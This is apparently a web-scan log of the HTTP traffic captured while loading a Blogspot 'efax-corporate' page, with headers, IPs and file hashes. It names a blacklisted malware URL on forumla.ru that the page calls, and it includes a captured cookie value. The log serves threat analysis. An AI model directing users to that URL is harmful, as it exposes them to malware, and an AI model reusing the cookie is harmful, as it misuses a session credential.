Sha256: ca9848e6006cfec8f9ffa29433ade8152204bdb95579200831c6dc0f53dff70b
                                        
                                            GET /img/icon18_wrench_allbkg.png HTTP/1.1 
Host: resources.blogblog.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html

                                         
                                         172.217.22.169
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Accept-Ranges: bytes
Content-Length: 475
Date: Sat, 09 Dec 2017 18:57:05 GMT
Expires: Sat, 16 Dec 2017 18:57:05 GMT
Last-Modified: Fri, 08 Dec 2017 19:28:35 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=604800
Age: 179142
Alt-Svc: hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"


--- Additional Info ---
Magic:  PNG image, 18 x 18, 8-bit colormap, non-interlaced
Size:   475
Md5:    f617effe6d96c15acfea8b2e8aae551f
Sha1:   6d676af11ad2e84b620cce4d5992b657cb2d8ab6
Sha256: d172d750493be64a7ed84dec1dd2a0d787ba42f78bc694b0858f152c52b6620b
                                        
                                            GET /feeds/posts/default?orderby=published&alt=json-in-script&callback=rp HTTP/1.1 
Host: blanksfile.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html

                                         
                                         172.217.22.161
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
                                        
Content-Encoding: gzip
Etag: W/"ec01821d60546f7dec427cba2fafbd7f0e1f18c8a6c989a813aa8e3fcfda1363"
Date: Mon, 11 Dec 2017 20:42:47 GMT
Server: blogger-renderd
Cache-Control: public, must-revalidate, proxy-revalidate, max-age=1
Vary: Accept-Encoding
Expires: Mon, 11 Dec 2017 20:42:48 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Last-Modified: Fri, 03 Oct 2014 06:09:32 GMT
Content-Length: 14012
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
Size:   14012
Md5:    df9566979ee69e990b8ad2d82eecf6a4
Sha1:   d5dacde727d6f8244aac3422fc3d6707bfd5a2b3
Sha256: a3c64704ee632bac72deb4799043789b145137cdc8c929ef135e6c8737e7f479
                                        
                                            GET /_/scs/apps-static/_/js/k=oz.gapi.no.1Fi7CQudkS4.O/m=plusone/rt=j/sv=1/d=1/ed=1/am=AQ/rs=AGLTcCOr5ej3ztkUZk0VbY6BF5li0lHi5g/cb=gapi.loaded_0 HTTP/1.1 
Host: apis.google.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html
Cookie: NID=119=okMAMXITwUeoVMUnyDvoWK4M8Ux77yzEn8sE00KBAHltyUxDgb6tjWlXAya7G9toN2SW51IP3J5_XtY7Q48K8NLilI3i1AyfEORQNnHsXxFYvnSXNq0TE0LR4iTiXgPv

                                         
                                         216.58.211.142
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
                                        
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 46602
Date: Sun, 10 Dec 2017 18:45:55 GMT
Expires: Mon, 10 Dec 2018 18:45:55 GMT
Last-Modified: Thu, 07 Dec 2017 02:15:56 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, immutable, max-age=31536000
Age: 93412
Alt-Svc: hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"


--- Additional Info ---
Magic:  gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
Size:   46602
Md5:    c6782206c5846062b5f30cb68af925a5
Sha1:   97e0a0d7ec3eebdd2ce7966fa38e3c0ec1f02b1f
Sha256: 19eb077cffa1af02bf0b65ca30f7db9fa1a885361f064a8652cfe369be5966f3
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: tektekdunk.blogspot.no
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         172.217.22.161
HTTP/1.1 200 OK
Content-Type: image/x-icon
                                        
Expires: Mon, 11 Dec 2017 20:42:47 GMT
Date: Mon, 11 Dec 2017 20:42:47 GMT
Cache-Control: private, max-age=86400
Last-Modified: Fri, 03 Oct 2014 07:32:15 GMT
Etag: W/"03a63c64f71485c82a2f64efbd0a532eda39d83c9bcec59e8f439a250f07389a"
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 412
Server: GSE


--- Additional Info ---
Magic:  gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
Size:   412
Md5:    23e5eb1119a7f4d2ab629ccd77a5f84b
Sha1:   f7a5a792e41005ba918551e4416c4bf639ec80ec
Sha256: a0c8d4831f453c316840a502432719f7f7d833bea4a9b59f548e4a1bc2bf0c8a
                                        
                                            GET /pagead/js/google_top_exp.js HTTP/1.1 
Host: pagead2.googlesyndication.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html

                                         
                                         216.58.209.130
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
                                        
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
Timing-Allow-Origin: *
Date: Wed, 06 Dec 2017 11:10:17 GMT
Expires: Wed, 20 Dec 2017 11:10:17 GMT
Etag: 13036835877489095579
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="f.txt"
Content-Encoding: gzip
Server: cafe
Content-Length: 67
X-XSS-Protection: 1; mode=block
Age: 466350
Cache-Control: public, max-age=1209600


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   67
Md5:    9bbc3ca32ec951a484589ce0e6b4db73
Sha1:   753d6f6183b33b2dee5dde2208fca91c17f5bb13
Sha256: b8f16a16d2a7ea39a9cc079fdbe3af7d31393d62a853668bdd549e0a0311cb3c
                                        
                                            GET /f/248/528/15m/go.evoice.com/CBD/500/default/default-en-web-logo.gif HTTP/1.1 
Host: a248.g.akamai.net
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html

                                         
                                         195.159.219.10
HTTP/1.0 200 OK
Content-Type: image/gif
                                        
Server: Apache
Last-Modified: Thu, 08 Aug 2013 17:48:55 GMT
Etag: "360cad-d61-4e37345a4759d"
Accept-Ranges: bytes
Content-Length: 3425
P3P: CP='NOI DSP COR NID BUS'
X-Robots-Tag: noindex
X-Frame-Options: sameorigin
Cneonction: close
Date: Mon, 11 Dec 2017 20:42:47 GMT
Connection: keep-alive
x-v1arl-whitelisted: true


--- Additional Info ---
Magic:  GIF image data, version 89a, 186 x 63
Size:   3425
Md5:    c4d50a24f615b7c1142bf0ea47e909b8
Sha1:   fab319dd206d07f412319d3359484a7e1adbb346
Sha256: 9d33080d445ccfd424ce7452da13af2a732142ffe6aaeb96d9880689aae884c2
                                        
                                            GET /forum/links/column.php HTTP/1.1 
Host: forumla.ru:8080
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html

                                         
                                         0.0.0.0
                                        


--- Additional Info ---

Alerts:
  urlquery:
    - Detects suspicious URL pattern
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /_/scs/apps-static/_/js/k=oz.gapi.no.1Fi7CQudkS4.O/m=gapi_iframes,gapi_iframes_style_bubble/exm=plusone/rt=j/sv=1/d=1/ed=1/am=AQ/rs=AGLTcCOr5ej3ztkUZk0VbY6BF5li0lHi5g/cb=gapi.loaded_1 HTTP/1.1 
Host: apis.google.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html
Cookie: NID=119=okMAMXITwUeoVMUnyDvoWK4M8Ux77yzEn8sE00KBAHltyUxDgb6tjWlXAya7G9toN2SW51IP3J5_XtY7Q48K8NLilI3i1AyfEORQNnHsXxFYvnSXNq0TE0LR4iTiXgPv

                                         
                                         0.0.0.0
                                        


--- Additional Info ---